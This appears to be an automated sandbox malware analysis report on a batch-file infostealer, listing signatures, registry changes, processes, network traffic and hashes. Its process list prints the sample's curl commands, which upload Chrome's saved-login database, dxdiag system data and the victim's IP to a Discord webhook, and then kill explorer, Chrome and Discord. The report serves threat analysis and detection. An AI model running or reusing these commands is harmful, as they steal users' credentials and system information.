Malware Analysis Report

2025-08-05 15:47

Sample ID 240528-y6yvhsah4x
Target oran (2).bat
SHA256 f17a109dff8890fa19ea9f4324c49daabf22d4b5c9386a1a819268f04eb9adeb
Tags
persistence
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

f17a109dff8890fa19ea9f4324c49daabf22d4b5c9386a1a819268f04eb9adeb

Threat Level: Shows suspicious behavior

The file oran (2).bat was found to be: Shows suspicious behavior.

Malicious Activity Summary

persistence

Registers COM server for autorun

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Delays execution with timeout.exe

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-28 20:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-28 20:24

Reported

2024-05-28 20:27

Platform

win7-20240419-en

Max time kernel

118s

Max time network

124s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2976 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\fltMC.exe
PID 2976 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\fltMC.exe
PID 2976 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\fltMC.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"

C:\Windows\system32\fltMC.exe

fltmc

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-28 20:24

Reported

2024-05-28 20:27

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

149s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"

Signatures

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 C:\Windows\system32\dxdiag.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_b748590104fe1c15\machine.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_adeb6424513f60a2\input.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_b748590104fe1c15\machine.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_adeb6424513f60a2\input.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF C:\Windows\system32\dxdiag.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dxdiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dxdiag.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dxdiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dxdiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\dxdiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\dxdiag.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1 C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7} C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1 C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B} C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Windows\system32\calc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{78EE6B3D-7E90-4F79-BBC4-B5E380F4806C} C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 C:\Windows\system32\dxdiag.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dxdiag.exe N/A
N/A N/A C:\Windows\system32\dxdiag.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\dxdiag.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1152 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\fltMC.exe
PID 1152 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\fltMC.exe
PID 1152 wrote to memory of 3400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1152 wrote to memory of 3400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3400 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3400 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1152 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1152 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1152 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1152 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4316 wrote to memory of 908 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4316 wrote to memory of 908 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1152 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\dxdiag.exe
PID 1152 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\dxdiag.exe
PID 1152 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1152 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 548 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 548 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\calc.exe
PID 1152 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\calc.exe
PID 1152 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 1152 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"

C:\Windows\system32\fltMC.exe

fltmc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get LocalDateTime /VALUE 2>NUL

C:\Windows\System32\Wbem\WMIC.exe

wmic os get LocalDateTime /VALUE

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -c "[guid]::NewGuid().ToString()"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "[guid]::NewGuid().ToString()"

C:\Windows\system32\dxdiag.exe

dxdiag /dontskip /whql:off /64bit /t c:\dxdiag.txt

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4240 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\curl.exe

curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\":\"g:b2af19bf-449f-4d89-9b01-30774846a846\"}" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"

C:\Windows\system32\curl.exe

curl -F "file1=@c:\dxdiag.txt" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"

C:\Windows\system32\curl.exe

curl -F "file1=@C:\Users\Admin\Appdata\Local\Google\Chrome\User Data\Default\Login Data" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl ifcfg.me

C:\Windows\system32\curl.exe

curl ifcfg.me

C:\Windows\system32\curl.exe

curl -o x.txt -X POST -H "Content-type: text/plain" --data 191.101.209.39 https://api.thebase64.com/encode?secret=your_secret

C:\Windows\system32\curl.exe

curl -F "[email protected]" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe :: restart

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe :: restart

C:\Windows\system32\taskkill.exe

taskkill /F /IM discord.exe :: restart

C:\Windows\system32\calc.exe

calc.exe :: restart

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\notepad.exe

notepad.exe :: restart

Network

Country Destination Domain Proto
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 216.58.215.42:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 42.215.58.216.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 ifcfg.me udp
US 34.172.225.131:80 ifcfg.me tcp
US 8.8.8.8:53 131.225.172.34.in-addr.arpa udp
US 8.8.8.8:53 api.thebase64.com udp
US 172.67.210.100:443 api.thebase64.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 100.210.67.172.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp

Files

memory/908-1-0x00007FF8A2163000-0x00007FF8A2165000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_seplbejy.aym.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/908-11-0x00000194EC170000-0x00000194EC192000-memory.dmp

memory/908-14-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp

memory/908-15-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp

memory/1460-16-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-18-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-17-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-22-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-28-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-27-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-26-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-25-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-24-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-23-0x00000139051B0000-0x00000139051B1000-memory.dmp

\??\c:\dxdiag.txt

MD5 14f366966c1763605aa6939cfe9ea0cd
SHA1 86b247165b6dda23a8fe57541c5f5db1f35ed901
SHA256 c0915a684ece3e7ab8c60a9787fa1a81a8c492ab0041af0a8e6b9ff1618efafa
SHA512 538fda37a1245ed5bf9f4dfbdb032ac732f50af201a37febf9abb640d7b9b1b5f982084655fa37156fa290baccd37a55da864b6e20fb0628bcbec815794c1bdd

C:\Users\Admin\AppData\Local\Temp\x.txt

MD5 69a7bf89dc20b524780cbb7447e34e9f
SHA1 b824ed67b6741a0a94b8f2cc89449f3b783fb9de
SHA256 b36eceb65ade81a9c859af73ce6cfa2a756c85cc9461d523df36546fadd32d44
SHA512 f1ae5eabecaa4b15c2d9b38f6565c48636b6bc1a70fae4a2aa5b4d7b1215d886663b6a2f9c813fb1ef7af3b467cd3fe3bb5276c12b01aa07087237dd373fa780